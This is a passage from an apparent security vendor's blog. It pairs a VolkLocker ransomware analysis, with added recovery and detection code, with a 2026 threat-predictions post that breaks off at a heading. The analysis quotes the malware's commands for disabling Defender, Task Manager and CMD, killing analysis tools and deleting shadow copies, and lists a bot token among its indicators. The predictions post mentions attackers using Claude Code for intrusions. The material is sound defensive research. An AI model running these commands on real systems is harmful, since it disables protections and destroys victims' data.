  • Writes a plaintext file containing the victim’s unique identifier, the complete master encryption key, and the attacker’s Bitcoin address
  • Applies Windows Hidden and System file attributes to obscure the file from casual directory listings
  • The file format is:
    User: CV<16 hex characters>
    Key: <64 hex characters - THE MASTER KEY>
    BTC: <attacker's bitcoin address>
    

Since the ransomware never deletes this backup key file, victims could attempt file recovery by extracting the necessary values from the file.

Decryption triggered via backed-up key file

The plaintext key backup likely represents a test artifact inadvertently shipped in production builds. CyberVolk operators may be unaware that affiliates are deploying builds with the backupMasterKey() function still embedded. Given that VolkLocker is a relatively new service, the presence of what appears to be debug functionality in live deployments suggests that the operation is struggling to maintain quality control while aggressively recruiting lesser-skilled affiliates.
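The recovery path implied by this section and by Encryption Mechanism, as an added Go example (not SentinelLABS’ tooling and not VolkLocker code): it parses the system_backup.key format and opens a nonce-prefixed AES-256-GCM blob. The sample key file, the sealSample helper and the absence of additional authenticated data are assumptions made for the example.

```go
package main

import (
	"bufio"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"encoding/hex"
	"fmt"
	"regexp"
	"strings"
)

// KeyBackup holds the three fields of system_backup.key in the format shown above.
type KeyBackup struct {
	VictimID string // "CV" followed by 16 hex characters
	Key      []byte // 32-byte AES-256 master key
	BTC      string // attacker's Bitcoin address, kept for the incident report
}

var victimIDRe = regexp.MustCompile(`^CV[0-9a-fA-F]{16}$`)

// ParseKeyBackup reads the User/Key/BTC lines (CRLF tolerated) and validates them.
func ParseKeyBackup(text string) (*KeyBackup, error) {
	kb := &KeyBackup{}
	sc := bufio.NewScanner(strings.NewReader(text))
	for sc.Scan() {
		name, value, _ := strings.Cut(sc.Text(), ":")
		value = strings.TrimSpace(value)
		switch strings.ToLower(strings.TrimSpace(name)) {
		case "user":
			kb.VictimID = value
		case "key":
			var err error
			if kb.Key, err = hex.DecodeString(value); err != nil {
				return nil, fmt.Errorf("key field is not valid hex: %w", err)
			}
		case "btc":
			kb.BTC = value
		}
	}
	if !victimIDRe.MatchString(kb.VictimID) {
		return nil, fmt.Errorf("missing or malformed User field: %q", kb.VictimID)
	}
	if len(kb.Key) != 32 {
		return nil, fmt.Errorf("expected a 32-byte key, got %d bytes", len(kb.Key))
	}
	return kb, nil
}

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// DecryptBlob reverses the layout described above (12-byte nonce || ciphertext || 16-byte tag),
// assuming no additional authenticated data. Open verifies the tag, so a wrong key errors out.
func DecryptBlob(key, blob []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize()+gcm.Overhead() {
		return nil, fmt.Errorf("blob of %d bytes cannot hold a nonce and tag", len(blob))
	}
	nonce, sealed := blob[:gcm.NonceSize()], blob[gcm.NonceSize():]
	return gcm.Open(nil, nonce, sealed, nil)
}

// sealSample builds a constructed blob in the same layout so the example runs offline.
func sealSample(key, plaintext []byte) ([]byte, error) {
	gcm, err := newGCM(key)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// Constructed sample; the key and identifiers are not real indicators.
const sampleBackup = "User: CV0123456789abcdef\r\n" +
	"Key: 000102030405060708090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f\r\n" +
	"BTC: bc1q-constructed-placeholder\r\n"

func main() {
	kb, err := ParseKeyBackup(sampleBackup)
	if err != nil {
		panic(err)
	}
	blob, _ := sealSample(kb.Key, []byte("quarterly report"))
	plain, err := DecryptBlob(kb.Key, blob)
	fmt.Printf("victim=%s recovered=%q err=%v\n", kb.VictimID, plain, err)
}
```

Because GCM authenticates the ciphertext, a failed Open is a reliable signal that the key file belongs to a different build or that the encrypted file is damaged; work on copies of the encrypted files.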

System Lockdown & Persistence Features

VolkLocker modifies multiple registry keys to inhibit system recovery and analysis:

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f

reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 2 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 4 /f

In addition, Windows Defender is targeted for termination via PowerShell:

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
sc config WinDefend start= disabled
net stop WinDefend /y

The malware also terminates processes associated with common analysis tools via taskkill.exe:

  • processhacker.exe
  • procexp.exe
  • procexp64.exe
  • taskmgr.exe

VolkLocker creates multiple identical copies of itself in various system locations to establish persistence:

    %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\cvolk.exe
    %PUBLIC%\Documents\svchost.exe
    %SYSTEMDRIVE%\ProgramData\Microsoft\Network\wlanext.exe
    %TEMP%\WindowsUpdate.exe
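One way to turn the registry, Defender, taskkill and persistence details above into triage logic over process-creation logs, as an added Go example rather than a SentinelOne detection rule. The Event type, host names, sample command lines and the three-rule threshold are assumptions; the vssadmin pattern comes from the File & Backup Destruction section of this page.

```go
package main

import (
	"fmt"
	"regexp"
	"sort"
)

// Event is one process-creation record (e.g. Sysmon Event ID 1 or Security 4688)
// reduced to the fields this example needs.
type Event struct {
	Host    string
	CmdLine string
}

type rule struct {
	name string
	re   *regexp.Regexp
}

// Patterns derived from the commands and paths listed on this page. Expanded paths
// such as \Users\Public\ assume default Windows environment values.
var rules = []rule{
	// reg add under a ...\Policies\... key setting one of the listed values to non-zero.
	{"registry-policy-lockdown", regexp.MustCompile(`(?i)\breg(\.exe)?"?\s+add\s.*\\policies\\.*\s/v\s+` +
		`(disableantispyware|disabletaskmgr|disableregistrytools|disablecmd|norun|noclose|nodrives)\s.*\s/d\s+0*[1-9]`)},
	{"defender-realtime-off", regexp.MustCompile(`(?i)\bset-mppreference\s.*-disablerealtimemonitoring\s+(\$true|1)\b`)},
	{"defender-service-tamper", regexp.MustCompile(`(?i)\b(sc(\.exe)?\s+config\s+windefend\s+start=\s*disabled|net1?(\.exe)?\s+stop\s+windefend)\b`)},
	{"analysis-tool-kill", regexp.MustCompile(`(?i)\btaskkill(\.exe)?\s.*\b(processhacker|procexp(64)?|taskmgr)\.exe`)},
	{"shadow-copy-delete", regexp.MustCompile(`(?i)\bvssadmin(\.exe)?\s+delete\s+shadows\b`)},
	// Legitimate svchost.exe and wlanext.exe run from System32, not from these folders.
	{"persistence-path", regexp.MustCompile(`(?i)\\(start menu\\programs\\startup\\cvolk|users\\public\\documents\\svchost|` +
		`programdata\\microsoft\\network\\wlanext|temp\\windowsupdate)\.exe`)},
}

// MatchRules returns the names of all rules a command line triggers.
func MatchRules(cmdLine string) []string {
	var hits []string
	for _, r := range rules {
		if r.re.MatchString(cmdLine) {
			hits = append(hits, r.name)
		}
	}
	return hits
}

// Triage returns, sorted, the hosts on which at least minRules distinct rules fired.
// A single hit can be routine administration; several together match the lockdown
// sequence described above.
func Triage(events []Event, minRules int) []string {
	seen := map[string]map[string]bool{}
	for _, e := range events {
		for _, name := range MatchRules(e.CmdLine) {
			if seen[e.Host] == nil {
				seen[e.Host] = map[string]bool{}
			}
			seen[e.Host][name] = true
		}
	}
	var flagged []string
	for host, names := range seen {
		if len(names) >= minRules {
			flagged = append(flagged, host)
		}
	}
	sort.Strings(flagged)
	return flagged
}

// Constructed sample events; host names are hypothetical.
var sampleEvents = []Event{
	{"WS-014", `reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f`},
	{"WS-014", `powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"`},
	{"WS-014", `sc config WinDefend start= disabled`},
	{"WS-014", `taskkill /F /IM procexp64.exe`},
	{"WS-014", `"C:\Users\Public\Documents\svchost.exe"`},
	{"WS-014", `vssadmin delete shadows /all /quiet`},
	// Help desk re-enabling Task Manager (/d 0) and unrelated commands: no rule fires.
	{"HELPDESK-02", `reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 0 /f`},
	{"HELPDESK-02", `reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"`},
	{"HELPDESK-02", `taskkill /F /IM notepad.exe`},
	// One isolated hit stays below the threshold.
	{"SRV-07", `net stop WinDefend /y`},
}

func main() {
	for _, e := range sampleEvents {
		fmt.Printf("%-12s %v\n", e.Host, MatchRules(e.CmdLine))
	}
	fmt.Println("flagged:", Triage(sampleEvents, 3))
}
```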

Ransom Note and Countdown Timer

VolkLocker’s ransom note is a dynamic HTML application. The file cybervolk_ransom.html is written to %TEMP% and launched both after encryption completes and upon system startup. The ransom note displays a countdown timer with a default duration of 48 hours. The duration of the timer can be configured by the RaaS operators.

CyberVolk (2025) Ransom note HTML

The JavaScript-based countdown timer is purely cosmetic. When it reaches zero, the triggerDestruction() function displays a shake animation and the message “💀 SYSTEM DESTROYED 💀.”

However, a separate enforcement timer operates independently of the browser-based display.

Timer for System Corruption and Destruction in CyberVolk

This enforcement timer is synchronized with the system clock using Golang’s time.After() function. When it expires, it calls the SystemCorruptor() and DestroySystem() functions. The same destructive routine triggers if an incorrect decryption key is provided more times than the configured maxAttempts value, which defaults to three.

File & Backup Destruction Mechanism

During system destruction, VolkLocker deletes the following folders from the user profile:

  • Documents
  • Desktop
  • Downloads
  • Pictures

The malware also deletes Volume Shadow Copies:

vssadmin delete shadows /all /quiet

Finally, VolkLocker triggers a BSOD (Blue Screen of Death) after a 10-second delay by calling NtRaiseHardError() with a specific status code.

BSOD Triggering in CyberVolk Ransomware

Telegram Integration

All aspects of the CyberVolk RaaS are managed through Telegram. Prospective customers and operational queries are directed to the main bot (CyberVolk_Kbot).

CyberVolk “V2” Bot

VolkLocker payloads include built-in Telegram automation for command and control. This aligns with CyberVolk’s operational model, where all communication, purchasing, and support occur through Telegram, a model the actors see as a “market differentiator”.

The default Telegram C2 supports the following commands:

  • /broadcast: Message all infected victims
  • /decrypt: Initiate file decryption
  • /help: Display command list
  • /list: List all active victims
  • /send: Message specific victim IDs
  • /start: Show administrative panel
  • /status: Get victim system information

The Telegram C2 is customizable. Some CyberVolk operators have published examples that include additional capabilities, such as keylogging control.

Customized CyberVolk RaaS Telegram Interface (including RAT & keylogging commands)

The telegramReporter() function alerts operators upon new infections, similar to Telegram-enabled infostealers. When a host is infected, basic system information and a screenshot are sent to the configured Telegram chat.

System Information sent to Telegram in CyberVolk’s ransomware

Expanded Services and Pricing

CyberVolk has expanded beyond ransomware. In November 2025, operators began advertising standalone RAT and keylogger tools, with the following advertised pricing model:

  • RaaS (single OS): $800-$1,100 USD
  • RaaS (Linux + Windows): $1,600-$2,200 USD
  • Standalone RAT or Keylogger: $500 USD each

Intelligence suggests bundle discounts are available for customers purchasing multiple services.

Conclusion

Despite repeated Telegram account bans and channel removals throughout 2025, CyberVolk has reestablished its operations and expanded its service offerings.

However, storing master encryption keys in plaintext is a significant design blunder that undermines the ransomware’s effectiveness, allowing victims to recover files without acceding to the threat actor’s ransom demand.

Nevertheless, defenders should see CyberVolk’s adoption of Telegram-based automation as a reflection of broader trends among politically-motivated threat actors. These groups continue to lower barriers for ransomware deployment while operating on platforms that provide convenient infrastructure for criminal services.

The SentinelOne Singularity Endpoint Platform currently detects and prevents malicious behaviors and artifacts associated with CyberVolk Ransomware attacks.

Indicators of Compromise

CyberVolk (VolkLocker 2025) Linux
0948e75c94046f0893844e3b891556ea48188608

CyberVolk (VolkLocker 2025) Windows
dcd859e5b14657b733dfb0c22272b82623466321

Bitcoin Address
bc1qujgdzl0v82gh9pvmg3ftgnknl336ku26nnp0vy (CyberVolk)

Telegram Bot Token
8368663132:AAHBfe3xYPtg1IMynKhQy1BRzuF5UZRZspw (CyberVolk)

Cybersecurity 2026 | The Year Ahead in AI, Adversaries, and Global Change

As we close out 2025 and look ahead to 2026, nothing is as we might have expected even a year ago. AI has disrupted, and will continue to disrupt, every corner of modern life. In threat intelligence, SentinelLABS has not only recognized this shift but actively pivoted to meet it. At the same time, geopolitical alignments have grown increasingly unstable, with long-standing relationships now less certain than ever.

How will these new realities shape enterprises’ ability to anticipate and counter the cyber threats forming on the horizon? Predictions always carry the caveat that the future remains intractably unknowable, but even the unexpected emerges from trajectories already in motion.

In this post, SentinelLABS researchers and leaders share their perspectives on how the cyber threat landscape is evolving and what may lie ahead. Read on to explore how developments in global strategy, organized cybercrime, and of course, AI could impact us all in the coming year.

The Forgiving Internet is Over

The cybersecurity industry has been living on borrowed time, and AI is about to call in the debt.

The effects of cyberattacks are not always immediately visible: sometimes they go by entirely unnoticed. That encourages a fundamental cybernetics problem, as there isn’t an obvious causal link between the levers available to defenders and the constraining effects imposed on attackers.

That broken loop can create a corrosive perception that what we do doesn’t have meaningful effects, which has allowed our industry to backslide into lowest-investment, compliance-checkbox territory.

Meanwhile, the feedback delay entails that just as exploitation can go unnoticed for years, technical debt sits dormant, unnoticed for prolonged stretches.

We are moving to a future where being vulnerable and being hacked are not two separate steps. Today, organizations run edge appliances riddled with a bottomless supply of weaponizable vulnerabilities and n-days, and yet they often come away uncompromised simply because no one has gotten around to them yet.

Consider Cl0p’s MOVEit campaign: nearly 2,800 organizations compromised, 96 million individuals’ data exposed and the group was still processing victims more than a year after the initial breach. Cl0p explicitly stated they leaked names slowly to avoid overwhelming their own negotiation capacity. The attack itself was automated, executed over a holiday weekend, largely complete before the patch dropped, but extortion is human work. That capacity bottleneck, the gap between what automation can compromise and what humans can monetize, is about to disappear.

The internet’s forgiveness is a function of attacker capacity, and AI is a capacity multiplier. When autonomous agents can probe, validate, and exploit at machine speed, the gap between vulnerable and compromised collapses. Without a countervailing investment in AI-native defense, that asymmetry becomes the defining feature of the landscape.

Attackers will harness AI as a force multiplier long before defenders do. Scrappy resourcefulness, clear financial incentives, and freedom from procurement cycles guarantee it.

The alignment discourse is a distraction. Local models on consumer hardware, unconstrained foreign providers, and enterprise no-retention deployments attest to this. The moment capable computer-use models run locally, guardrails become irrelevant. Anthropic’s recent disclosure of Chinese operators using Claude Code for autonomous intrusions is instructive: one operator hitting thirty targets with minimal human intervention. By their own account, model hallucinations did more to slow the attackers down than any guardrails.

If defenders can thank AI for anything, it will be a fundamental reassignment of value, a revamping of capacity, and a necessary reimagining of what’s possible.

Feeble attempts to conjure tens of thousands of competent practitioners out of thin air have clearly floundered. Thankfully, getting more bodies isn’t the only way to increase capacity anymore. AI offers exactly that. It invites us to revisit implicit ROI calculations we abandoned long ago. We can now reconsider activities that required human intervention but were deemed too incremental and repetitive to be consequential: processing every document in a breach disclosure, pre-processing logs at scale, reverse engineering tangential codebases to better understand malicious code. These were not impossible tasks; they were tasks we decided not to attempt. That calculus has changed.

However, we must be clear-eyed about what we are adopting. These systems are non-deterministic. We are integrating a new form of evaluative power that is commoditized and cheap but also largely outside our control. Their outputs need to be wrangled into predictably acceptable parameters. The organizations that operationalize AI effectively will be those that learn to harness uncertainty within acceptable bounds rather than pretend it doesn’t exist.

What the market is missing (and desperately requires) are organizations that function as step-down transformers: converting raw frontier capability into security outcomes. Frontier labs are racing toward general capability while treating security as one of several potential markets. The result is a gap between what models can theoretically accomplish and what defenders can reliably deploy. Someone must bridge that gap with products and services that translate commoditized evaluative power into deployable autonomy.

This means investment in experimentation to redefine security problems in terms of what AI can make tractable, improve, or solve without waiting for archaic vendors to catch up. The threat actor(s) using Claude Code to maximize their operational capability didn’t stumble into competence. They iterated, tested, and created a harness for ready deployment with the human as far out of the loop as possible. Defenders will need equivalent rigor.

The opportunity is real and sizable. Seizing it requires that security as a practice becomes AI-native. Organizations that treat AI as another line item will find themselves overwhelmed by an operational tempo they cannot match. Those who internalize it as a fundamental shift, on both sides of the adversarial line, have a chance to redefine the dynamics of the security space. The value generated in 2026 and beyond is entirely concentrated in filling that gap between frontier capability and operational deployment.
Juan Andres Guerrero-Saade (JAGS), Senior Technical Fellow and VP of Intelligence and Security Research, SentinelLABS

Hemispheric Crossfire | US–Venezuela Cyber Operations Drag in the Big Three

As of late 2025, Venezuela has already shifted from a chronic crisis to a genuine flashpoint. U.S. carrier groups and expanded maritime operations in the Caribbean, public talk of “closing” Venezuelan airspace, and speculation about regime‑change scenarios have raised the temperature dramatically. Caracas, for its part, is signaling a willingness to fight a long guerrilla struggle and “anarchize” the environment if the U.S. moves militarily. At the same time, Venezuela has deepened its alignment with Russia, Iran, and China, explicitly seeking security guarantees, capital, and military assistance from all three.

In such an environment, a realistic 2026 development is the partial exposure of U.S. offensive cyber and information operations targeting Venezuela. This doesn’t mean Hollywood‑style leaks of every covert program; it looks more like a mosaic of glimpses:

  • A social media platform announces a takedown of coordinated inauthentic networks seeding narratives aimed at Venezuelan military factions and diaspora communities.
  • A contractor leak reveals tooling used to profile Venezuelan officers, union leaders, and local elites.
  • A regional report connects seemingly independent media outlets and meme sources back to U.S.-linked funding and infrastructure, blurring the line between strategic communications and covert influence.

None of this is unprecedented. Great powers all play in this space, but the political salience of Venezuela today means the blowback will be sharper and more public than usual.

That exposure offers raw material for counter‑narratives and operations by Caracas’ backers. Russia is already running well‑funded Spanish‑language disinformation and propaganda campaigns across Latin America, often in coordination with partner state media, with a long‑standing focus on undermining U.S. standing in the region. Iran has used Venezuela as a beachhead for sanctions evasion, proxy networks, and anti‑U.S. activity, including leveraging IRGC and Hezbollah-linked structures to expand its reach in the hemisphere. China, meanwhile, is quietly consolidating intelligence collection capabilities via regional ground stations, telecom infrastructure, and proximity to key undersea cables, assets Western analysts already flag as potential platforms for surveillance of U.S. communications.

In 2026, we should expect to see cyber and information operations explicitly framed as “defending Venezuela from U.S. aggression”, but operationally aimed at the United States and its closest partners.

  • Russian and Venezuela‑aligned influence networks will likely amplify any evidence of U.S. IO/espionage, real, exaggerated, or fabricated, into Spanish and English‑language campaigns targeting U.S. domestic audiences, Latin American publics, and the Venezuelan diaspora.
  • Iranian‑linked actors can be expected to piggyback on the crisis to probe U.S. critical infrastructure and financial networks under an “Axis of Authoritarianism” narrative, using the Venezuela storyline to justify escalation in cyber operations they were running for other reasons anyway.
  • Chinese‑linked capabilities are more likely to manifest as intensified collection and mapping, SIGINT on U.S. deployments, diplomatic traffic, and commercial flows, rather than loud influence campaigns, but that data will feed the same broader alignment.

For CTI teams, the prediction isn’t some “big Venezuela cyber war,” it’s a convergence problem. A Venezuelan crisis becomes the pretext that ties together Russian, Iranian, Chinese, and local pro‑regime operators into loosely synchronized campaigns: hack‑and‑leak operations targeting U.S. policy debates; cross‑platform disinformation linking Venezuela to border, drugs, and migration narratives; the probing of U.S. energy, maritime, and telecom infrastructure under the cover of regional tension.

Expect to see Spanish‑language infrastructure and personas show up in incidents that ultimately impact U.S. and European networks and more clusters where attribution threads run through Caracas and Moscow/Tehran/Beijing at the same time. The organizations most likely to feel this first are those at the seam lines: energy, logistics, telecom, diaspora media, and NGOs with one foot in the U.S. and one in the region.
Tom Hegel, Distinguished Threat Researcher, SentinelLABS

China’s Fifteenth Five Year Plan

A new Five-Year Plan from the Chinese Communist Party means a new hit-list for China’s hackers.

After Xi came into power in 2013, he set about issuing development goals for science and technology in China not seen since the leadership of Mao Zedong. The most notable, Made in China 2025, was released two years later in 2015. After American opprobrium reached its peak in the first Trump administration, China slowly withdrew MIC2025 from the limelight. American attention to the strategy led to significant collection difficulties for the PRC as the US FBI and other government agencies prioritized defense of targeted technologies in the private sector and at US research institutions, like universities.

In 2021, the PRC released publicly only a vague outline of the Party’s Medium- to Long-Term Development Plan for Scientific and Technological Innovation, which set innovation goals for 2025, 2030, and 2035. Foreign attention to MIC2025 led the Party to mark the full content of the plan as “internal circulation only.”

The 15th Five-Year Plan promises to push some of those privately-held development goals into the spotlight. The PRC central government will release the official 15th FYP in 2025, and will delegate many of the details about achieving its objectives to government ministries. Ministries will release their more-detailed version of the 15th FYP in late 2025 or early 2026. Those documents create a political demand signal for provincial governments and bureaucracies to work towards realizing.

Contracted hackers looking to pilfer western technology and sell it to the highest bidder in China will consult those documents to identify the technologies their customers are likely to pay good money for. If your industry is on the list of targeted technologies, buckle up.
Dakota Cary, Senior Security Advisory Consultant

 

Organized Cybercrime | More Integrated, Streamlined & Aggressive

Commodities and Cartels

Ransomware and infostealers are now commodity features. We’ve blown past this milestone in the last couple of years. Consider ransomware and data exfiltration as givens in the event of any opportunistic breach. While the days of the ‘big brand’ extortion operations are waning, we are seeing more small, organized groups offering à la carte services, including ransomware, but ultimately, this is just another feature available in ‘run of the mill malware’.

The blending of infostealer and ransomware-style features into more Swiss Army knife tools and services will attract a broader set of criminals, a natural evolution already underway, given the heavy reliance of modern attacks on the infostealer logs ecosystem.

This also overlaps with the trend towards more ‘Cartel-style’ operations or ‘alliances’ which consolidate disparate malicious services into more all-encompassing “MaaS” offerings.

Ransomware & Initial Access Brokers

As these cartels and service ecosystems solidify, the relationships that underpin initial access are tightening as well. Ransomware groups continue to work closely with IABs (Initial Access Brokers), with an increasing number of threat actors publicly and aggressively attempting to recruit ‘trusted’ IABs. Groups like Sicarii advertise special advantages to others willing to partner with them.

Sicarii Ransom’s ‘recruitment’ of IABs

Additionally, we can expect to see IABs starting to offer more targeted bundles consisting of curated credential sets. For example, IABs will start offering ‘chains’ based on cumulative sets of related credentials (chain of VPN->O365->Cloud Console access for a target). There are some specializing in this now, but we expect this to become more mainstream as the infostealer log ecosystem, which feeds many IABs, continues to explode.

Increasing Attacks Will Offer Defenders Fewer IOCs and Artifacts

There are some interesting micro trends within these smaller, more obscure, operations. One such trend is the omission of ransom notes and other noisy filesystem artifacts, and threat actors moving towards more direct follow-ups via emails and phone calls to initiate communications.

We have seen groups like “Penguin Cartel” operate in this way, and we expect adversaries to increasingly embrace these alternate methods of first notification in extortive attacks.

Businesses Will Keep Losing Data, Encryption Not Required

This operational “quieting” aligns with another growing trend: attackers no longer need to encrypt data to profit from it. This is far from new, but it is increasing. More crimeware actors eschew encryption entirely, opting to extort victims to prevent release of the exfiltrated data. Groups like Kairos and WorldLeaks are current examples of this model.

Kairos DLS banner (exfiltration only)

More Automation, More Upscaling

While the “AI-revolution” has yet to fully transform the downstream atomic artifacts of crimeware, cybercriminals are taking advantage of various automation options, using AI to augment and scale-up their output.

An increasing number of actors are leveraging AI agents, Telegram bots and similar features to automate both the discovery and sale of their products and their C2 activities. This has long been a practice in the traditional infostealer community, but we are seeing an uptick across the crimeware landscape.

Pressure Escalates Tactics

Threat actors are continuing to apply real-world violence (VaaS) to ensure their profitability. Naming-and-shaming via data leak sites will remain a permanent feature of the landscape, but we will see further pressure being applied to business clients, customers, family members and entities that are peripheral to the victim. One common manifestation of this is swatting groups being called upon to apply pressure to financial crime victims.

Additionally, threat actors will continue to leverage regulatory and compliance laws to apply pressure and time leak announcements around critical events such as earnings calls or M&A negotiations.
Jim Walter, Senior Threat Researcher, SentinelLABS

 

Living Off Apple’s Land | Latent Powers and Stolen Trust

Last year, we noted how threat actors were making hay abusing AppleScript’s spoof-friendly ability to create password dialog boxes to gain elevated privileges, but as many unfortunate victims have been finding out this year, that’s far from all AppleScript is good for.

ClickFix is the new social-engineering kid-on-the-block for every stripe of threat actor from nation state APTs to opportunistic cryptowallet-stealing cybercriminals. Dropping a simple two-line AppleScript that opens an innocuous webpage, perhaps a support portal for some legit technology, with up to 10000 blank lines ending with a few malicious lines of code is a ridiculously simple but effective method of social engineering.

A macOS ClickFix-style social engineering script

2026 will see the continuation of both techniques. However, as old as Python and as powerful as PowerShell, AppleScript has a lot more juice left in it from a threat actor point of view.

We are just beginning to see the first signs of adversaries making use of AppleScript’s Objective-C (AS-ObjC) bridge — a wonderful technology that brings the power of Apple’s Foundation and AppKit frameworks, including NSWorkspace, to simple AppleScripts. In the past, we’ve seen AS-ObjC’s newer cousin JXA (JavaScript for Automation) gain traction in red-teaming tools like Apfell; it’s a small conceptual leap from there to the (arguably) easier world of AppleScript Objective-C.

That opens up a whole new world of in-memory scripting power that otherwise usually requires a compiled binary and readily-detectable file writes. Will we see threat actors lean into this old, built-in, not-widely known, yet incredibly powerful way of programming Mac computers? If you’re a threat actor, it’s a Living-off-the-Land technology dream come true. If you’re a defender, it’d be smart to start thinking about what that looks like from a telemetry point-of-view in 2026. And while we’re on the topic of powerful, Apple Framework-enhanced scripting languages, Swift scripting is a thing worth keeping in mind, too.

On macOS, ClickFix was a necessity-is-the-mother-of-invention response to Apple’s plugging of the Gatekeeper workaround. However, you don’t need a bypass to Apple’s increasingly strict code signing and notarization rules if your malware is signed with a valid developer ID.

Illicit trade in verified Apple Developer accounts is something we’ve seen increase in the latter half of 2025, and it’s only a matter of time before we see these abused by more malware authors. Temporary they may be, as Apple is quick to nix such accounts once identified, but even a short-lived campaign can do a lot of damage against the right targets.

The lesson for defenders is not to treat validly code signed executables as some kind of exception to detection rules. Signed code tells a defender little more than that it passed Apple’s automated checks and that the code has a name attached to it. In the case of malware, that’s almost certainly not the name of a threat actor.
Phil Stokes, macOS Research Engineer, SentinelLABS
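
For defenders thinking about the telemetry question raised in the macOS section above, the following added example (not SentinelLABS code) triages AppleScript source text for the two traits described there: a short visible head separated from trailing code by a long run of blank lines, and use of the AS-ObjC bridge. The threshold, function names and sample scripts are assumptions constructed for illustration.

```javascript
// Added example: static triage of AppleScript source text.
// PAD_THRESHOLD is an assumed value; tune it against scripts seen in your fleet.
const PAD_THRESHOLD = 50;

// Find the longest run of consecutive blank (whitespace-only) lines.
function longestBlankRun(lines) {
  let best = { length: 0, start: -1 };
  let runLength = 0;
  let runStart = -1;
  lines.forEach((line, i) => {
    if (line.trim() === "") {
      if (runLength === 0) runStart = i;
      runLength += 1;
      if (runLength > best.length) best = { length: runLength, start: runStart };
    } else {
      runLength = 0;
    }
  });
  return best;
}

function triageAppleScript(source) {
  const lines = source.split(/\r\n|\r|\n/);
  const run = longestBlankRun(lines);
  const nonBlank = (l) => l.trim() !== "";

  // Code before the padding is what a user sees; code after it is scrolled out of view.
  const head = run.start < 0 ? [] : lines.slice(0, run.start).filter(nonBlank);
  const tail = run.start < 0 ? [] : lines.slice(run.start + run.length).filter(nonBlank);

  // Padding only matters when real code sits on both sides of it.
  const paddedLayout = run.length >= PAD_THRESHOLD && head.length > 0 && tail.length > 0;

  // AS-ObjC markers: `use framework "..."` statements and bridged Cocoa classes.
  const frameworks = [...source.matchAll(/^[ \t]*use\s+framework\s+"([^"]+)"/gim)].map((m) => m[1]);
  const bridgedClasses = [...new Set(
    [...source.matchAll(/current application's\s+(NS[A-Za-z]+)/g)].map((m) => m[1])
  )];

  return {
    paddingRun: run.length,
    paddedLayout,
    visibleLines: paddedLayout ? head : [],
    hiddenLines: paddedLayout ? tail : [],
    hiddenShell: paddedLayout && tail.some((l) => /\bdo shell script\b/i.test(l)),
    frameworks,
    bridgedClasses,
  };
}

// Constructed sample: visible line, 200 blank lines, then a harmless placeholder.
const SAMPLE_PADDED = [
  'open location "https://support.example.invalid/help"',
  ...Array(200).fill(""),
  'do shell script "echo constructed-placeholder"',
].join("\n");

// Constructed sample: benign AS-ObjC script touching NSWorkspace.
const SAMPLE_ASOBJC = [
  'use framework "Foundation"',
  'use framework "AppKit"',
  "use scripting additions",
  "",
  "set ws to current application's NSWorkspace's sharedWorkspace()",
].join("\n");

console.log(triageAppleScript(SAMPLE_PADDED));
console.log(triageAppleScript(SAMPLE_ASOBJC));
```

AS-ObjC usage is common in legitimate automation, so the `frameworks` and `bridgedClasses` fields are context for an analyst rather than a verdict; the padded layout with hidden trailing code is the stronger signal.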

 

The AI Reckoning | Consolidation, Censorship, and Economic Fallout

Specialized Models Will Belong to Those Who Can Make Them

Over the next few years, we’ll watch a huge number of AI companies simply disappear.

The generic “copilot for X” and “AI workspace” products that dominated pitch decks in 2023–2024 will be reborn as bloodless, checkbox features inside Microsoft 365, Google Workspace, and other large platforms. The quality will be worse than the specialized startups they replace, but that won’t matter because they’ll be easy to buy on an enterprise contract, come bundled with existing tools, and be turned on with a toggle in an admin console.

The result will look like a mass extinction. Valuations will implode and the easy money will evaporate. The tech influencer class on X will still push the “996 grindset mentality” even as the few humbled survivors of the crash pivot from “owning the category” to cutting costs and delivering durable value to a smaller, demanding set of customers.

But this is also exactly the environment in which truly specialized organizations start to matter. These smaller entrants will sit in narrow, high-stakes domains: cybersecurity, law, finance, industrial control, biotech…

In those areas, the winners will be teams that have quietly built a repeatable data and training pipeline, have access to proprietary datasets, and can deploy smaller models that are integrated into specific workflows, regulations, and hardware.

Advances in training efficiency, data curation, and model compression will be among the most valuable pieces of this puzzle, and they will increasingly move out of public view. Labs will publish less, national-security programs will classify more, and a handful of specialized shops will jealously guard their pipelines.

The Bubble Pops in a Poisoned Reality

